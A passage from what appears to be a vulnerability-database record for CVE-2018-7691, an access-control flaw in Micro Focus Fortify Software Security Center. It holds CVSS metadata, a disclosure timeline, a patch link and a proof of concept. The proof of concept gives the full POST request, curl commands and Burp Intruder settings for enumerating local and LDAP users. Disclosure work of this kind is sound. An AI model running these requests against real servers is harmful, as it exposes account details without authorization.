received from the vendor\r\n2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem\r\n2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem\r\n2018-10-11: Feedback from the vendor, technical details provided to the researcher\r\n2018-10-16: Fixes now tested on QA environment\r\n2018-11-08: Reminder received from the vendor, feedback provided by researcher\r\n2018-11-09: Re-rest fixes on QA environment\r\n2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed\r\n2018-11-21: Researcher feedback\r\n2018-11-23: Fixes working well/confirmed by researcher\r\n2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.\r\n2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure\r\n2018-11-26: Agreements with the vendor to publish the CVE/Advisory.\r\n2018-12-12: Public report\r\n\r\nDiscovered by:\r\nAlex Hernandez aka alt3kx:\r\n================\r\nPlease visit https://github.com/alt3kx for more information.\r\n\r\nMy current exploit list @exploit-db:\r\nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576\n\n# 0day.today [2018-12-18] #", "sourceHref": "https://0day.today/exploit/31784", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:39:09", "description": "A potential Remote Unauthorized Access in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, 18.10 this exploitation could allow Remote Unauthorized Access", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": 
"2018-12-13T14:29:00", "type": "cve", "title": "CVE-2018-7691", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7691"], "modified": "2019-10-09T23:42:00", "cpe": ["cpe:/a:microfocus:fortify_software_security_center:17.10", "cpe:/a:microfocus:fortify_software_security_center:18.10", "cpe:/a:microfocus:fortify_software_security_center:17.20"], "id": "CVE-2018-7691", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7691", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microfocus:fortify_software_security_center:17.20:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:fortify_software_security_center:18.10:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:fortify_software_security_center:17.10:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:34:14", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-12-14T00:00:00", "type": "exploitdb", "title": "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 
8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7691", "2018-7691"], "modified": "2018-12-14T00:00:00", "id": "EDB-ID:45990", "href": "https://www.exploit-db.com/exploits/45990", "sourceData": "Details\r\n================\r\nSoftware: Fortify SSC (Software Security Center)\r\nVersion: 17.10, 17.20 & 18.10\r\nHomepage: https://www.microfocus.com\r\nAdvisory report: https://github.com/alt3kx/CVE-2018-7691\r\nCVE: CVE-2018-7691\r\nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\r\nCWE-639\r\n\r\nDescription\r\n================\r\nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method\r\n\r\nVulnerability\r\n================\r\nFortify SSC (Software Security Center) 17.10, does not properly check ownership of \"authEntities\", which allows remote authenticated (view-only) users\r\nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities\r\n\r\nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.\r\n\r\nProof of concept\r\n================\r\n\r\nPre-requisites:\r\n\r\n- Curl command deployed (Windows or Linux)\r\n- jq command deployed (for parsing JSON fields), (Windows or Linux)\r\n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)\r\n\r\nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),\r\n\r\nThe URL normally is avaiable as 
following:\r\n\r\nTarget: https://fortifyserver.com/ssc/#/\r\n\r\nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default\r\n\r\nStep (4): The offending POST is:\r\n\r\nPOST /ssc/api/v1/bulk HTTP/1.1\r\nHost: fortifyserver.com\r\nConnection: close\r\nAccept: application/json, text/plain, */*\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\r\nContent-Type: application/json;charset=UTF-8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\r\nContent-Length: 123\r\n\r\n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a\r\n\r\nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'\r\n\r\nYou 
should see the following response:\r\n\r\n200\r\n\r\nStep (6): Now extract all local and LDAP users registered in the Fortify SSC server:\r\n\r\nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the \"--data-binary\" field below and change the number as follows:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \\\r\n-H \"Host: fortifyserver.com\" \\\r\n-H \"Connection: close\" \\\r\n-H \"Accept: application/json, text/plain, */*\" \\\r\n-H \"X-Requested-With: XMLHttpRequest\" \\\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\" \\\r\n-H \"Content-Type: application/json;charset=UTF-8\" \\\r\n-H \"Accept-Encoding: gzip, deflate\" \\\r\n-H \"Accept-Language: en-US,en;q=0.9\" \\\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \\\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \\\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\" \\\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'\r\n\r\nYou should see the following response listing the available users:\r\n\r\n\"admin\"\r\n\"sca\"\r\n\"alex\"\r\n\r\n[../snip]\r\n\r\nStep (7): To automate with BurpSuite Pro/Free, choose:\r\n\r\nPayload Positions: \"Intruder Tab -> Positions\", highlight as follows:\r\n\r\n-> /api/v1/projectVersions/\u00a71\u00a7/authEntities\r\n\r\nPayload set: \"Intruder Tab -> Payloads\" with the following data:\r\n\r\n-> Payload set: 1\r\n\r\n-> Payload type: Numbers\r\n\r\nPayload Options [Numbers]:\r\n\r\n-> Type: Sequential\r\n\r\n-> From: 0\r\n\r\n-> To: 1500\r\n\r\n-> Step: 1\r\n\r\nThen start attack\u2026\r\nHave fun!\r\n\r\nMitigations\r\n================\r\nInstall the latest patches available here:\r\nhttps://softwaresupport.softwaregrp.com/doc/KM03298201\r\n\r\nDisclosure policy\r\n================\r\nWe believe in responsible 
disclosure.\r\nPlease contact Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.\r\n\r\nThis vulnerability will be published if we do not receive a response to this report within 10 days.\r\n\r\nTimeline\r\n================\r\n\r\n2018-05-24: Discovered\r\n2018-05-25: Retest PRO environment\r\n2018-05-31: Vendor notification, two issues found\r\n2018-05-31: Vendor feedback received\r\n2018-06-01: Internal communication\r\n2018-06-01: Vendor feedback, two issues are confirmed\r\n2018-06-05: Vendor notification, new issue found\r\n2018-06-06: Vendor feedback, evaluating High submission\r\n2018-06-08: Vendor feedback, High issue is confirmed\r\n2018-06-19: Researcher, reminder sent\r\n2018-06-22: Vendor feedback, summary of CVEs handled as official way\r\n2018-06-26: Vendor feedback, official Hotfix for High issue available to test\r\n2018-06-29: Researcher feedback\r\n2018-07-02: Researcher feedback\r\n2018-07-04: Researcher feedback, Hotfix tested on QA environment\r\n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018\r\n2018-08-02: Reminder to vendor, feedback received OK!\r\n2018-09-26: Reminder to vendor, feedback received OK!\r\n2018-09-26: Fixes received from the vendor\r\n2018-10-02: Internal QA environment failed, re-building researcher's ecosystem\r\n2018-10-11: Internal QA environment failed, re-building researcher's ecosystem\r\n2018-10-11: Feedback from the vendor, technical details provided to the researcher\r\n2018-10-16: Fixes now tested on QA environment\r\n2018-11-08: Reminder received from the vendor, feedback provided by researcher\r\n2018-11-09: Re-test fixes on QA environment\r\n2018-11-15: Re-test fixes on QA environment now with SSC 18.20 version deployed\r\n2018-11-21: Researcher feedback\r\n2018-11-23: Fixes working well/confirmed by researcher\r\n2018-11-23: Vendor feedback, final details to disclose the CVE and official fixes available for customers.\r\n2018-11-26: Vendor feedback, CVE, and official 
fixes to be disclosed\r\n2018-11-26: Agreements with the vendor to publish the CVE/Advisory.\r\n2018-12-12: Public report\r\n\r\nDiscovered by:\r\nAlex Hernandez aka alt3kx:\r\n================\r\nPlease visit https://github.com/alt3kx for more information.\r\n\r\nMy current exploit list @exploit-db:\r\nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576", "sourceHref": "https://www.exploit-db.com/download/45990", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}]}